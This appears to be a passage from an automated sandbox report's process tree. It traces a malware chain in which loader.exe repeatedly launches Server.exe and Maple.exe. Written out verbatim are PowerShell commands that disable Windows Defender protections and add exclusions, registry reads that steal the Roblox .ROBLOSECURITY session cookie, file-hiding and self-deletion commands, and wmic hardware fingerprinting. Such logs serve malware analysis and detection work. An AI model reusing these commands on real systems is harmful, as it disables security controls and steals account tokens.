                                                                            "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
                                                                            15⤵
                                                                            • Command and Scripting Interpreter: PowerShell
                                                                            PID:3604
                                                                          • C:\Windows\System32\Wbem\wmic.exe
                                                                            "wmic" path win32_VideoController get name
                                                                            15⤵
                                                                            • Detects videocard installed
                                                                            PID:1672
                                                                          • C:\Windows\SYSTEM32\cmd.exe
                                                                            "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\Maple.exe" && pause
                                                                            15⤵
                                                                            • System Network Configuration Discovery: Internet Connection Discovery
                                                                            PID:64
                                                                            • C:\Windows\system32\PING.EXE
                                                                              ping localhost
                                                                              16⤵
                                                                              • System Network Configuration Discovery: Internet Connection Discovery
                                                                              • Runs ping.exe
                                                                              PID:928
                                                                        • C:\Users\Admin\AppData\Local\Temp\loader.exe
                                                                          "C:\Users\Admin\AppData\Local\Temp\loader.exe"
                                                                          14⤵
                                                                          • Checks computer location settings
                                                                          • Executes dropped EXE
                                                                          PID:4640
                                                                          • C:\Users\Admin\AppData\Local\Temp\Server.exe
                                                                            "C:\Users\Admin\AppData\Local\Temp\Server.exe"
                                                                            15⤵
                                                                            • Executes dropped EXE
                                                                            • System Location Discovery: System Language Discovery
                                                                            PID:812
                                                                          • C:\Users\Admin\AppData\Local\Temp\Maple.exe
                                                                            "C:\Users\Admin\AppData\Local\Temp\Maple.exe"
                                                                            15⤵
                                                                            • Executes dropped EXE
                                                                            PID:5112
                                                                          • C:\Users\Admin\AppData\Local\Temp\loader.exe
                                                                            "C:\Users\Admin\AppData\Local\Temp\loader.exe"
                                                                            15⤵
                                                                            • Checks computer location settings
                                                                            • Executes dropped EXE
                                                                            PID:2556
                                                                            • C:\Users\Admin\AppData\Local\Temp\Server.exe
                                                                              "C:\Users\Admin\AppData\Local\Temp\Server.exe"
                                                                              16⤵
                                                                              • Executes dropped EXE
                                                                              • System Location Discovery: System Language Discovery
                                                                              PID:4612
                                                                            • C:\Users\Admin\AppData\Local\Temp\Maple.exe
                                                                              "C:\Users\Admin\AppData\Local\Temp\Maple.exe"
                                                                              16⤵
                                                                              • Drops file in Drivers directory
                                                                              • Executes dropped EXE
                                                                              PID:4160
                                                                              • C:\Windows\System32\Wbem\wmic.exe
                                                                                "wmic.exe" csproduct get uuid
                                                                                17⤵
                                                                                  PID:1344
                                                                                • C:\Windows\SYSTEM32\attrib.exe
                                                                                  "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\Maple.exe"
                                                                                  17⤵
                                                                                  • Views/modifies file attributes
                                                                                  PID:1584
                                                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                  "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Maple.exe'
                                                                                  17⤵
                                                                                    PID:3176
                                                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                    "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
                                                                                    17⤵
                                                                                    • Command and Scripting Interpreter: PowerShell
                                                                                    PID:332
                                                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                    "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
                                                                                    17⤵
                                                                                    • Command and Scripting Interpreter: PowerShell
                                                                                    PID:1656
                                                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                    "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
                                                                                    17⤵
                                                                                      PID:2136
                                                                                    • C:\Windows\System32\Wbem\wmic.exe
                                                                                      "wmic.exe" os get Caption
                                                                                      17⤵
                                                                                        PID:5064
                                                                                      • C:\Windows\System32\Wbem\wmic.exe
                                                                                        "wmic.exe" computersystem get totalphysicalmemory
                                                                                        17⤵
                                                                                          PID:3136
                                                                                        • C:\Windows\System32\Wbem\wmic.exe
                                                                                          "wmic.exe" csproduct get uuid
                                                                                          17⤵
                                                                                            PID:4512
                                                                                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                            "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
                                                                                            17⤵
                                                                                            • Command and Scripting Interpreter: PowerShell
                                                                                            PID:4768
                                                                                          • C:\Windows\System32\Wbem\wmic.exe
                                                                                            "wmic" path win32_VideoController get name
                                                                                            17⤵
                                                                                            • Detects videocard installed
                                                                                            PID:5068
                                                                                          • C:\Windows\SYSTEM32\cmd.exe
                                                                                            "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\Maple.exe" && pause
                                                                                            17⤵
                                                                                            • System Network Configuration Discovery: Internet Connection Discovery
                                                                                            PID:1980
                                                                                            • C:\Windows\system32\PING.EXE
                                                                                              ping localhost
                                                                                              18⤵
                                                                                              • System Network Configuration Discovery: Internet Connection Discovery
                                                                                              • Runs ping.exe
                                                                                              PID:2556
                                                                                        • C:\Users\Admin\AppData\Local\Temp\loader.exe
                                                                                          "C:\Users\Admin\AppData\Local\Temp\loader.exe"
                                                                                          16⤵
                                                                                          • Checks computer location settings
                                                                                          • Executes dropped EXE
                                                                                          PID:2928
                                                                                          • C:\Users\Admin\AppData\Local\Temp\Server.exe
                                                                                            "C:\Users\Admin\AppData\Local\Temp\Server.exe"
                                                                                            17⤵
                                                                                            • Executes dropped EXE
                                                                                            • System Location Discovery: System Language Discovery
                                                                                            PID:4640
                                                                                          • C:\Users\Admin\AppData\Local\Temp\Maple.exe
                                                                                            "C:\Users\Admin\AppData\Local\Temp\Maple.exe"
                                                                                            17⤵
                                                                                            • Executes dropped EXE
                                                                                            PID:4644
                                                                                          • C:\Users\Admin\AppData\Local\Temp\loader.exe
                                                                                            "C:\Users\Admin\AppData\Local\Temp\loader.exe"
                                                                                            17⤵
                                                                                            • Checks computer location settings
                                                                                            • Executes dropped EXE
                                                                                            PID:1036
                                                                                            • C:\Users\Admin\AppData\Local\Temp\Server.exe
                                                                                              "C:\Users\Admin\AppData\Local\Temp\Server.exe"
                                                                                              18⤵
                                                                                              • Executes dropped EXE
                                                                                              • System Location Discovery: System Language Discovery
                                                                                              PID:3832
                                                                                            • C:\Users\Admin\AppData\Local\Temp\Maple.exe
                                                                                              "C:\Users\Admin\AppData\Local\Temp\Maple.exe"
                                                                                              18⤵
                                                                                              • Executes dropped EXE
                                                                                              PID:1776
                                                                                            • C:\Users\Admin\AppData\Local\Temp\loader.exe
                                                                                              "C:\Users\Admin\AppData\Local\Temp\loader.exe"
                                                                                              18⤵
                                                                                              • Checks computer location settings
                                                                                              • Executes dropped EXE
                                                                                              PID:3184
                                                                                              • C:\Users\Admin\AppData\Local\Temp\Server.exe
                                                                                                "C:\Users\Admin\AppData\Local\Temp\Server.exe"
                                                                                                19⤵
                                                                                                • Executes dropped EXE
                                                                                                • System Location Discovery: System Language Discovery
                                                                                                PID:2380
                                                                                              • C:\Users\Admin\AppData\Local\Temp\Maple.exe
                                                                                                "C:\Users\Admin\AppData\Local\Temp\Maple.exe"
                                                                                                19⤵
                                                                                                • Drops file in Drivers directory
                                                                                                • Executes dropped EXE
                                                                                                PID:2860
                                                                                                • C:\Windows\System32\Wbem\wmic.exe
                                                                                                  "wmic.exe" csproduct get uuid
                                                                                                  20⤵
                                                                                                    PID:4112
                                                                                                  • C:\Windows\SYSTEM32\attrib.exe
                                                                                                    "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\Maple.exe"
                                                                                                    20⤵
                                                                                                    • Views/modifies file attributes
                                                                                                    PID:1164
                                                                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Maple.exe'
                                                                                                    20⤵
                                                                                                      PID:3528
                                                                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                      "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
                                                                                                      20⤵
                                                                                                        PID:2752
                                                                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                        "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
                                                                                                        20⤵
                                                                                                        • Command and Scripting Interpreter: PowerShell
                                                                                                        PID:5112
                                                                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                        "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
                                                                                                        20⤵
                                                                                                          PID:2212
                                                                                                        • C:\Windows\System32\Wbem\wmic.exe
                                                                                                          "wmic.exe" os get Caption
                                                                                                          20⤵
                                                                                                            PID:2888
                                                                                                          • C:\Windows\System32\Wbem\wmic.exe
                                                                                                            "wmic.exe" computersystem get totalphysicalmemory
                                                                                                            20⤵
                                                                                                              PID:2736
                                                                                                            • C:\Windows\System32\Wbem\wmic.exe
                                                                                                              "wmic.exe" csproduct get uuid
                                                                                                              20⤵
                                                                                                                PID:1120
                                                                                                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
                                                                                                                20⤵
                                                                                                                • Command and Scripting Interpreter: PowerShell
                                                                                                                PID:1528
                                                                                                              • C:\Windows\System32\Wbem\wmic.exe
                                                                                                                "wmic" path win32_VideoController get name
                                                                                                                20⤵
                                                                                                                • Detects videocard installed
                                                                                                                PID:4900
                                                                                                              • C:\Windows\SYSTEM32\cmd.exe
                                                                                                                "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\Maple.exe" && pause
                                                                                                                20⤵
                                                                                                                • System Network Configuration Discovery: Internet Connection Discovery
                                                                                                                PID:1188
                                                                                                                • C:\Windows\system32\PING.EXE
                                                                                                                  ping localhost
                                                                                                                  21⤵
                                                                                                                  • System Network Configuration Discovery: Internet Connection Discovery
                                                                                                                  • Runs ping.exe
                                                                                                                  PID:1156
                                                                                                            • C:\Users\Admin\AppData\Local\Temp\loader.exe
                                                                                                              "C:\Users\Admin\AppData\Local\Temp\loader.exe"
                                                                                                              19⤵
                                                                                                              • Checks computer location settings
                                                                                                              • Executes dropped EXE
                                                                                                              PID:1628
                                                                                                              • C:\Users\Admin\AppData\Local\Temp\Server.exe
                                                                                                                "C:\Users\Admin\AppData\Local\Temp\Server.exe"
                                                                                                                20⤵
                                                                                                                • Executes dropped EXE
                                                                                                                • System Location Discovery: System Language Discovery
                                                                                                                PID:4856
                                                                                                              • C:\Users\Admin\AppData\Local\Temp\Maple.exe
                                                                                                                "C:\Users\Admin\AppData\Local\Temp\Maple.exe"
                                                                                                                20⤵
                                                                                                                • Executes dropped EXE
                                                                                                                PID:3012
                                                                                                              • C:\Users\Admin\AppData\Local\Temp\loader.exe
                                                                                                                "C:\Users\Admin\AppData\Local\Temp\loader.exe"
                                                                                                                20⤵
                                                                                                                • Checks computer location settings
                                                                                                                • Executes dropped EXE
                                                                                                                PID:2200
                                                                                                                • C:\Users\Admin\AppData\Local\Temp\Server.exe
                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\Server.exe"
                                                                                                                  21⤵
                                                                                                                  • Executes dropped EXE
                                                                                                                  • System Location Discovery: System Language Discovery
                                                                                                                  PID:2700
                                                                                                                • C:\Users\Admin\AppData\Local\Temp\Maple.exe
                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\Maple.exe"
                                                                                                                  21⤵
                                                                                                                  • Drops file in Drivers directory
                                                                                                                  PID:1808
                                                                                                                  • C:\Windows\System32\Wbem\wmic.exe
                                                                                                                    "wmic.exe" csproduct get uuid
                                                                                                                    22⤵
                                                                                                                      PID:1088
                                                                                                                    • C:\Windows\SYSTEM32\attrib.exe
                                                                                                                      "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\Maple.exe"
                                                                                                                      22⤵
                                                                                                                      • Views/modifies file attributes
                                                                                                                      PID:3532
                                                                                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                      "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Maple.exe'
                                                                                                                      22⤵
                                                                                                                        PID:4556
                                                                                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                        "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
                                                                                                                        22⤵
                                                                                                                        • Command and Scripting Interpreter: PowerShell
                                                                                                                        PID:3196
                                                                                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                        "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
                                                                                                                        22⤵
                                                                                                                        • Command and Scripting Interpreter: PowerShell
                                                                                                                        PID:2704
                                                                                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                        "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
                                                                                                                        22⤵
                                                                                                                          PID:3372
                                                                                                                        • C:\Windows\System32\Wbem\wmic.exe
                                                                                                                          "wmic.exe" os get Caption
                                                                                                                          22⤵
                                                                                                                            PID:3348
                                                                                                                          • C:\Windows\System32\Wbem\wmic.exe
                                                                                                                            "wmic.exe" computersystem get totalphysicalmemory
                                                                                                                            22⤵
                                                                                                                              PID:2228
                                                                                                                            • C:\Windows\System32\Wbem\wmic.exe
                                                                                                                              "wmic.exe" csproduct get uuid
                                                                                                                              22⤵
                                                                                                                                PID:5116
                                                                                                                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
                                                                                                                                22⤵
                                                                                                                                • Command and Scripting Interpreter: PowerShell
                                                                                                                                PID:4200
                                                                                                                              • C:\Windows\System32\Wbem\wmic.exe
                                                                                                                                "wmic" path win32_VideoController get name
                                                                                                                                22⤵
                                                                                                                                • Detects videocard installed
                                                                                                                                PID:1036
                                                                                                                              • C:\Windows\SYSTEM32\cmd.exe
                                                                                                                                "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\Maple.exe" && pause
                                                                                                                                22⤵
                                                                                                                                • System Network Configuration Discovery: Internet Connection Discovery
                                                                                                                                PID:2200
                                                                                                                                • C:\Windows\system32\PING.EXE
                                                                                                                                  ping localhost
                                                                                                                                  23⤵
                                                                                                                                  • System Network Configuration Discovery: Internet Connection Discovery
                                                                                                                                  • Runs ping.exe
                                                                                                                                  PID:4724
                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\loader.exe
                                                                                                                              "C:\Users\Admin\AppData\Local\Temp\loader.exe"
                                                                                                                              21⤵
                                                                                                                              • Checks computer location settings
                                                                                                                              PID:4880
                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\Server.exe
                                                                                                                                "C:\Users\Admin\AppData\Local\Temp\Server.exe"
                                                                                                                                22⤵
                                                                                                                                • System Location Discovery: System Language Discovery
                                                                                                                                PID:1260
                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\Maple.exe
                                                                                                                                "C:\Users\Admin\AppData\Local\Temp\Maple.exe"
                                                                                                                                22⤵
                                                                                                                                  PID:3856
                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\loader.exe
                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\loader.exe"
                                                                                                                                  22⤵
                                                                                                                                  • Checks computer location settings
                                                                                                                                  PID:3984
                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\Server.exe
                                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\Server.exe"
                                                                                                                                    23⤵
                                                                                                                                    • System Location Discovery: System Language Discovery
                                                                                                                                    PID:1160
                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\Maple.exe
                                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\Maple.exe"
                                                                                                                                    23⤵
                                                                                                                                    • Drops file in Drivers directory
                                                                                                                                    PID:2716
                                                                                                                                    • C:\Windows\System32\Wbem\wmic.exe
                                                                                                                                      "wmic.exe" csproduct get uuid
                                                                                                                                      24⤵
                                                                                                                                        PID:3172
                                                                                                                                      • C:\Windows\SYSTEM32\attrib.exe
                                                                                                                                        "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\Maple.exe"
                                                                                                                                        24⤵
                                                                                                                                        • Views/modifies file attributes
                                                                                                                                        PID:4776
                                                                                                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                        "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Maple.exe'
                                                                                                                                        24⤵
                                                                                                                                          PID:1460
                                                                                                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                          "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
                                                                                                                                          24⤵
                                                                                                                                          • Command and Scripting Interpreter: PowerShell
                                                                                                                                          PID:4176
                                                                                                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                          "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
                                                                                                                                          24⤵
                                                                                                                                          • Command and Scripting Interpreter: PowerShell
                                                                                                                                          PID:2704
                                                                                                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                          "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
                                                                                                                                          24⤵
                                                                                                                                            PID:3832
                                                                                                                                          • C:\Windows\System32\Wbem\wmic.exe
                                                                                                                                            "wmic.exe" os get Caption
                                                                                                                                            24⤵
                                                                                                                                              PID:2728
                                                                                                                                            • C:\Windows\System32\Wbem\wmic.exe
                                                                                                                                              "wmic.exe" computersystem get totalphysicalmemory
                                                                                                                                              24⤵
                                                                                                                                                PID:1996
                                                                                                                                              • C:\Windows\System32\Wbem\wmic.exe
                                                                                                                                                "wmic.exe" csproduct get uuid
                                                                                                                                                24⤵
                                                                                                                                                  PID:1092
                                                                                                                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                  "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
                                                                                                                                                  24⤵
                                                                                                                                                  • Command and Scripting Interpreter: PowerShell
                                                                                                                                                  PID:4976
                                                                                                                                                • C:\Windows\System32\Wbem\wmic.exe
                                                                                                                                                  "wmic" path win32_VideoController get name
                                                                                                                                                  24⤵
                                                                                                                                                  • Detects videocard installed
                                                                                                                                                  PID:1628
                                                                                                                                                • C:\Windows\SYSTEM32\cmd.exe
                                                                                                                                                  "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\Maple.exe" && pause
                                                                                                                                                  24⤵
                                                                                                                                                  • System Network Configuration Discovery: Internet Connection Discovery
                                                                                                                                                  PID:2024
                                                                                                                                                  • C:\Windows\system32\PING.EXE
                                                                                                                                                    ping localhost
                                                                                                                                                    25⤵
                                                                                                                                                    • System Network Configuration Discovery: Internet Connection Discovery
                                                                                                                                                    • Runs ping.exe
                                                                                                                                                    PID:3088
                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\loader.exe
                                                                                                                                                "C:\Users\Admin\AppData\Local\Temp\loader.exe"
                                                                                                                                                23⤵
                                                                                                                                                • Checks computer location settings
                                                                                                                                                PID:3088
                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\Server.exe
                                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\Server.exe"
                                                                                                                                                  24⤵
                                                                                                                                                  • System Location Discovery: System Language Discovery
                                                                                                                                                  PID:1732
                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\Maple.exe
                                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\Maple.exe"
                                                                                                                                                  24⤵
                                                                                                                                                    PID:1672
                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\loader.exe
                                                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\loader.exe"
                                                                                                                                                    24⤵
                                                                                                                                                    • Checks computer location settings
                                                                                                                                                    PID:2888
                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\Server.exe
                                                                                                                                                      "C:\Users\Admin\AppData\Local\Temp\Server.exe"
                                                                                                                                                      25⤵
                                                                                                                                                      • System Location Discovery: System Language Discovery
                                                                                                                                                      PID:2744
                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\Maple.exe
                                                                                                                                                      "C:\Users\Admin\AppData\Local\Temp\Maple.exe"
                                                                                                                                                      25⤵
                                                                                                                                                      • Drops file in Drivers directory
                                                                                                                                                      PID:3032
                                                                                                                                                      • C:\Windows\System32\Wbem\wmic.exe
                                                                                                                                                        "wmic.exe" csproduct get uuid
                                                                                                                                                        26⤵
                                                                                                                                                          PID:2676
                                                                                                                                                        • C:\Windows\SYSTEM32\attrib.exe
                                                                                                                                                          "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\Maple.exe"
                                                                                                                                                          26⤵
                                                                                                                                                          • Views/modifies file attributes
                                                                                                                                                          PID:5052
                                                                                                                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                          "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Maple.exe'
                                                                                                                                                          26⤵
                                                                                                                                                            PID:3480
                                                                                                                                                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                            "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
                                                                                                                                                            26⤵
                                                                                                                                                              PID:2680
                                                                                                                                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                              "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
                                                                                                                                                              26⤵
                                                                                                                                                              • Command and Scripting Interpreter: PowerShell
                                                                                                                                                              PID:3648
                                                                                                                                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                              "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
                                                                                                                                                              26⤵
                                                                                                                                                                PID:2240
                                                                                                                                                              • C:\Windows\System32\Wbem\wmic.exe
                                                                                                                                                                "wmic.exe" os get Caption
                                                                                                                                                                26⤵
                                                                                                                                                                  PID:4856
                                                                                                                                                                • C:\Windows\System32\Wbem\wmic.exe
                                                                                                                                                                  "wmic.exe" computersystem get totalphysicalmemory
                                                                                                                                                                  26⤵
                                                                                                                                                                    PID:3428
                                                                                                                                                                  • C:\Windows\System32\Wbem\wmic.exe
                                                                                                                                                                    "wmic.exe" csproduct get uuid
                                                                                                                                                                    26⤵
                                                                                                                                                                      PID:4516
                                                                                                                                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                      "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
                                                                                                                                                                      26⤵
                                                                                                                                                                      • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                      PID:516
                                                                                                                                                                    • C:\Windows\System32\Wbem\wmic.exe
                                                                                                                                                                      "wmic" path win32_VideoController get name
                                                                                                                                                                      26⤵
                                                                                                                                                                      • Detects videocard installed
                                                                                                                                                                      PID:3960
                                                                                                                                                                    • C:\Windows\SYSTEM32\cmd.exe
                                                                                                                                                                      "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\Maple.exe" && pause
                                                                                                                                                                      26⤵
                                                                                                                                                                      • System Network Configuration Discovery: Internet Connection Discovery
                                                                                                                                                                      PID:396
                                                                                                                                                                      • C:\Windows\system32\PING.EXE
                                                                                                                                                                        ping localhost
                                                                                                                                                                        27⤵
                                                                                                                                                                        • System Network Configuration Discovery: Internet Connection Discovery
                                                                                                                                                                        • Runs ping.exe
                                                                                                                                                                        PID:4880
                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\loader.exe
                                                                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\loader.exe"
                                                                                                                                                                    25⤵
                                                                                                                                                                    • Checks computer location settings
                                                                                                                                                                    PID:1984
                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\Server.exe
                                                                                                                                                                      "C:\Users\Admin\AppData\Local\Temp\Server.exe"
                                                                                                                                                                      26⤵
                                                                                                                                                                      • System Location Discovery: System Language Discovery
                                                                                                                                                                      PID:4912
                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\Maple.exe
                                                                                                                                                                      "C:\Users\Admin\AppData\Local\Temp\Maple.exe"
                                                                                                                                                                      26⤵
                                                                                                                                                                        PID:1260
                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\loader.exe
                                                                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\loader.exe"
                                                                                                                                                                        26⤵
                                                                                                                                                                        • Checks computer location settings
                                                                                                                                                                        PID:3172
                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\Server.exe
                                                                                                                                                                          "C:\Users\Admin\AppData\Local\Temp\Server.exe"
                                                                                                                                                                          27⤵
                                                                                                                                                                          • System Location Discovery: System Language Discovery
                                                                                                                                                                          PID:3204
                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\Maple.exe
                                                                                                                                                                          "C:\Users\Admin\AppData\Local\Temp\Maple.exe"
                                                                                                                                                                          27⤵
                                                                                                                                                                            PID:2972
                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\loader.exe
                                                                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\loader.exe"
                                                                                                                                                                            27⤵
                                                                                                                                                                            • Checks computer location settings
                                                                                                                                                                            PID:1156
                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\Server.exe
                                                                                                                                                                              "C:\Users\Admin\AppData\Local\Temp\Server.exe"
                                                                                                                                                                              28⤵
                                                                                                                                                                              • System Location Discovery: System Language Discovery
                                                                                                                                                                              PID:4644
                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\Maple.exe
                                                                                                                                                                              "C:\Users\Admin\AppData\Local\Temp\Maple.exe"
                                                                                                                                                                              28⤵
                                                                                                                                                                              • Drops file in Drivers directory
                                                                                                                                                                              PID:1948
                                                                                                                                                                              • C:\Windows\System32\Wbem\wmic.exe
                                                                                                                                                                                "wmic.exe" csproduct get uuid
                                                                                                                                                                                29⤵
                                                                                                                                                                                  PID:3440
                                                                                                                                                                                • C:\Windows\SYSTEM32\attrib.exe
                                                                                                                                                                                  "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\Maple.exe"
                                                                                                                                                                                  29⤵
                                                                                                                                                                                  • Views/modifies file attributes
                                                                                                                                                                                  PID:1008
                                                                                                                                                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                  "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Maple.exe'
                                                                                                                                                                                  29⤵
                                                                                                                                                                                    PID:3572
                                                                                                                                                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
